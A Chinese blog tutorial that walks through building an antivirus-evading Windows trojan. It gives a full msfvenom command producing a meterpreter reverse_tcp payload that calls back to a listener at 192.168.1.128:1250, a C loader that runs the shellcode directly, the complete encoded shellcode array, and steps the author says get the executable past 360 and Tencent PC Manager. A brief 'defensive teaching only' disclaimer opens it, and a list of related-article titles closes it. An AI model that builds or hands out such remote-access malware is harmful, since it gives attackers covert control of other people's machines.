作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

msfvenom免杀木马

  • 介绍
  • msfvenom参数
  • 木马制作
    • 1,生成C语言代码
    • 2,使用vc++创建项目
    • 3,编译并组建文件,实现360免杀。
    • 4,实现对腾讯管家免杀
  • VC++报错
  • 总结

介绍

msfvenom是用来制作msf所支持的木马文件的,在这介绍一下msfvenom的几个使用参数,和如何制作免杀木马。
主要过程就是使用msfvenom指定特定编码,编码次数等生成c语言代码,再使用VC++ 生成程序文件。

msfvenom参数

这里列出几个常用参数,其他参数可使用help查看。

-p 指定所使用的payload
-e 指定使用的编码器
-b 删除无效字符
-i 指定编码次数
-f 指定生成的文件类型
-l 列出可使用的项
-o 导出为某文件
-x 捆绑文件
-platform 指定目标系统

木马制作

1,生成C语言代码

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikat_ga_nai -i 12 -b '\x00' lhost=192.168.1.128 lport=1250 -f c使用msfvenom生成payload为reverse_tcp、编码器为x86/shikat_ga_nai、经过12次编码并删除空白符\x00的C语言代码

2,使用vc++创建项目



创建一个win32的程序,取名随便,位置自愿,然后确定,选择一个简单32程序,完成。

在FileView下查看源代码文件,在源文件下有两个文件,shell1.cpp和stdAfx.cpp文件。我们打开shell1.cpp文件进行修改

将shell1.cpp中文件删除,并添加两部分

#include "stdafx.h"
#include <stdio.h>
#pragma comment(linker,"/subsystem:"windows"/entry:"mainCRTStartup"")
unsigned char buf[]=
(这里放生成好的数组)
main()
{
((void(*)(void))&buf)();
}
unsigned char buf[] =
"\xbf\x02\x0f\x56\x3e\xd9\xec\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\xa0\x83\xed\xfc\x31\x7d\x10\x03\x7d\x10\xe0\xfa\x8d\xe0\x5c"
"\x22\x1a\x22\xc7\xf2\x2e\x78\x03\x5f\xfc\x49\x5a\xf9\x81\x89"
"\x98\xcb\xc6\x1b\xa3\x68\xdf\xc1\x70\x9f\x2f\x87\x19\x46\x2b"
"\x03\x5d\x5a\x62\x47\x01\x70\x12\x42\x8a\x12\xd9\xc8\x5c\x2b"
"\x1f\x0b\xdf\xdd\xa8\x6e\x50\x14\x34\x5c\x53\xa6\xe6\x60\x59"
"\xc7\x7e\xd8\x25\x2d\xfd\xeb\xc4\xe5\xe5\x11\x48\xa4\xd8\x54"
"\xe0\x6e\x35\x3b\x41\x1e\x16\x15\x1c\xbd\xfc\xb7\x28\xfe\x3b"
"\x27\x53\xb6\xe0\xcc\x83\x60\x13\x30\x16\x3a\xb1\xfc\x20\x18"
"\x31\xd4\xad\x2d\xd5\x0a\x78\x7c\xa3\x90\x83\xda\x98\xb5\x9e"
"\x0c\x6c\x71\x7e\xb8\x2d\x69\x22\xdb\x73\x7e\x2d\xd9\x47\xf9"
"\x20\x39\xb6\xed\x06\x10\x54\x4d\x33\xc2\xb5\xd4\x81\x0d\x2f"
"\x54\x76\xaf\x68\xdb\xe5\xac\x19\xef\x56\x21\x62\x6e\x60\x4e"
"\xd8\xd0\xf7\x13\xa7\xd4\x85\x4e\x47\xa0\xc1\x31\x15\x87\xc0"
"\x10\xe0\x39\x2a\xee\xaa\xdd\x91\xee\xce\x22\xd8\x04\x21\xe7"
"\x7a\x3e\x1d\x17\x2e\xd2\x8a\x82\xe5\x48\xcf\x55\xbd\x14\xd9"
"\x83\x9a\x4e\x7f\x37\xb3\xf8\x56\xbf\xda\x0a\xac\xa8\x24\x0a"
"\x32\xee\x49\x4f\x4f\x96\x4b\x05\x10\xfb\xe9\x94\xfa\x9e\x28"
"\xbc\xf8\xe8\x7c\x70\xd7\xc6\x7d\x95\x0e\xc8\xa7\x27\xc6\x04"
"\x1f\xff\x65\x81\xf3\x1d\xe9\x01\xf8\xf1\x4d\x67\xe8\xac\x51"
"\x5d\x37\xe9\x1d\x97\x4d\x0c\xd9\x6f\xd5\xba\x4e\xbe\x2a\x4a"
"\x84\xde\xa6\xe6\xb9\xdf\xd4\xb2\x84\xaf\x54\x63\xcb\x9b\x7b"
"\x0e\x55\xc1\xc3\x7c\x12\x58\xa2\x12\x15\x08\xf7\x73\x94\x92"
"\x36\x41\xb2\x5b\x59\x80\x38\xc4\x08\xf2\x4f\xff\xd6\x9a\x4a"
"\x64\x60\xed\x19\xa1\x4d\x1f\x85\x36\x77\x92\x5f\xf2\x90\x91"
"\xa5\x12\xd7\x99\xb7\x3f\xff\xc2\x82\x3f\x88\x37\x31\x33\xea"
"\x3f\x49\x03\xe2\x1f\xfa\x34\x69\x41\x0e\x52\x5e\xe6\xed\x27"
"\x89\xbd\x72\xa4\x15\xe4\x14\x1b\x9a\xab\x77\x63\x20\x71\xe4"
"\x95\x4b\xcd\x5e\x08\x2b\x55\x6f\xbe\x24\x24\xbd\x85\xbc\x15"
"\xef\xc0\x22\x1f\x81\x3f\xc1\x4d\x6c\xcf\x62\x0f\xa0\xfb\x52"
"\x5e\xcc\xb6\x63\xcc\x91\x15\x45\xea\xc8\x94\xa8\x3e\x2b\x32"
"\xc2\xce\xcd\xc2\x1c\x2c\x82\x7f\xaf\xee\x8a\x5a\x07\x4d\x7c"
"\x11\x44\xd7\x62\xd4\xf9\xcb\xb0\x89\x09\xb6\x8b\xbc\x4a\x66"
"\x85\xcb\xd0\x78\xff\xbd\x16\xf2\xf3\x67\x75\x2d\x99\x3c\x1c"
"\x7d\x8a\xda\x54\x8a\x07\xf3\x93\x42\x48\x4b\xc2\x18\x1d\x08"
"\xe6\xc8\x41\x41\x0e\xb5\x61\xf6\x4f\xe1\x9e\x4a\x7b\xe6\x06"
"\xae\x72\x9e\x92\x3b\x0d\xc8\x72\x3c\x0e\x28\x95\x0f\x7a\x7c"
"\x58\x57\xf5\x9f\xf0\x7d\x0d\xb0\x24\x5c\x75\x3c\xb9\xc6\x6f"
"\xbb\xe1\x1b\x13\x21\x12\xad\xfa\x8f\x87\x87\x1a\xb7\x39\x86"
"\x2f\x0c\xd3\x25\xd9\x62\xcf\x0f\xaa\x0b\x03\xd6\xc9\x5c\xaf"
"\x08\x29\x59\x39\x70\x8f\x06\x3e\xe0\x19\xdd\x93\x34\x10\x28"
"\xa2\xea\x4d\x84\xef\xea\x43\xab\x1d\x2e\x55\x25\x4d\xb8\x32"
"\x2c\x22\x73\x03\xb3\xc9\xba\xb8\xea\xa6\x9c\xad\x86\x78\x8b"
"\x1a\x76\x20\xbd\x12\xf2\x41\x04\x67\x80\x22\xa6\xb4\xe1\x5f"
"\x62\xcc\x58\x75\xe7";

修改后如下图

3,编译并组建文件,实现360免杀。

先对stdafx.cpp文件进行编译,不报错。


再对shell1.cpp文件编译,并不报错

都不报错后进行组建

组建不报错后,会在项目文件的Debug文件夹下生成文件shell1.exe,这就是我们所生成的木马文件,对文件右键使用360扫描,发现此时的文件可绕过360免杀。

4,实现对腾讯管家免杀

在360免杀的文件基础上,添加些乱七八糟的文件
点击文件,新建

生成个光标文件,名666

在里面乱花几下

相同步骤,多生成几个光标文件,图标文件,位图文件,脚本啥的四五个就行。
然后编译组建,生成了新的shell1.exe文件,使用腾讯管家扫描,发现成功绕过。

VC++报错

编译都成功时,进行组建可能会报错,修改一下VC++配置。
在菜单栏。组建配置的c/c++下,修改WINDOWS为CONSOLE

在连接下修改windows为console,确定就行了。

总结

此种方法原理就不具体介绍了,能过360和腾讯,但不能过火绒,生成exe文件后的进一步操作就靠你们自己了。

msfvenom制作360,腾讯免杀木马相关推荐

  1. Web渗透之MSF框架——msfvenom与免杀木马制作

    文章目录 生成常见的反向连接木马 反向连接的优势: Windows: Linux: MAC: PHP: Asp: Aspx: msfvenom参数介绍 生成免杀木马 360免杀木马 腾讯管家免杀木马 ...

  2. 偷工减料制作自己的免杀木马 6月11日更新(秒杀主流11款杀软)

    很多新手在为能有一个免杀木马头疼,也相信很多人在饭客论坛上等待别人更新免杀,可是刚拿到手不久就又被杀了,呵呵,这里告诉大家一个小秘密,偷工减料得到免杀木马噢,而且不会被杀... 饭客论坛经常更新免杀, ...

  3. 绕过杀毒软件,免杀木马制作

    绕过杀毒软件,免杀木马制作(以AVG Anti Spyware杀毒软件为例) 一.将Sever.exe打开,分块生成100个文件 二.使用AVG Anti Spyware查杀生成的文件,再二次处理,重 ...

  4. 利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑

    前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马. 首先安装Venom Venon克隆地址:https://gi ...

  5. 实战: unicorn生成免杀木马,绕过win10防火墙和windows defender

    实战: unicorn生成免杀木马,绕过win10防火墙和windows defender 简介 原理 步骤 攻击 总结 简介 随着操作系统的安全等级越来越高,对能免杀,无视防火墙的木马需求也越来越高 ...

  6. Metasploit——msfvenom免杀木马

    msfvenom命令的参数 Options:-l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platfo ...

  7. 【木马】利用Python制作一个接受式免杀载荷

    目录 什么是接受式免杀载荷? 关于Pervise 免责声明 接受式载荷的工作流程 1. 开始运行 2. 连接成功 3. 运行载荷 4. 再次建立连接 实现接受式载荷的工作 接受式载荷 服务端 实验载荷 ...

  8. 利用Metasploit制作免杀木马

    请大家认真选择投票项,后续更新以此作为依据. 今日更新PPT内容11个,内容:数据安全, CASB保护零信任环境的数据安全实践: https://www.secshi.com/39625.html 以 ...

  9. 使用Bypass_AV-main进行免杀木马

    项目地址:https://github.com/Axx8/Bypass_AV 生成shellcode,ip与端口替换 将生成的shellcode复制下来放入项目中的py文件 将shellcode复制到 ...

  10. 【免杀】————2、php免杀木马的思路

    一般的,利用能够执行系统命令.加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做 Webshell. 本篇文章主要探讨关于 PHP 语言的 Webshell 检测工具和平 ...

最新文章

  1. 33 张图详解 RSTP 、MSTP、替代技术
  2. CentOS5 部署 戴尔OMSA
  3. Redundant Connection (684)
  4. 1.7 编程基础之字符串 32 行程长度编码 python
  5. 采集浏览器访问某网站时产生的流量,并保存为pcap文件
  6. JavaScript Array 对象(length)方法 (contact、push,pop,join,map、reverse、slice、sort)
  7. 设计模式的七大设计原则:其四:里氏替换原则
  8. Linux 基础命令3 shell
  9. Linux下安装zookeeper集群,以及在window用dubbo和代码测试
  10. 从零开始搭建公司电商系统架构技术栈,这套架构绝了...
  11. 女程序员:秃头的富婆不好当
  12. app逆向案例分析-极速抖音
  13. 3600000毫秒等于多少小时_一毫秒(一毫秒等于多少毫秒)
  14. web前端学习34(表格标签 小说排行榜案例)
  15. 怎么用计算机给u盘加密文件,电脑如何使用bitlocker功能给u盘加密
  16. matlab:图像处理
  17. js数组中__ob__: Observer属性
  18. 南大通用GBase 8c数据库与泛微软件完成互认证 共同搭建统一数字化办公平台
  19. Java中super详解
  20. 如何在服务器端开启X Display(本地可操作远程界面)

热门文章

  1. xshell 连接vbox 虚拟机
  2. snapchat为什么_我的Snapchat朋友旁边的表情符号是什么意思?
  3. 《冰河世纪》特效指导罗皓做客【ftrack聊天室】
  4. 余淼杰老师 经济学原理复习笔记(宏观3) 2020-12-14
  5. 阿里巴巴web前端电话面试题
  6. C#调用FluentFTP将文件批量上传到ftp服务器
  7. 基于百度短语音API的语音识别实现
  8. java门基础学习(五)
  9. 【设计开发命名必备】英语单词缩写规则
  10. VScode+esp-idf:编译腾讯物联网控制台ESP32例程(esp-qcloud)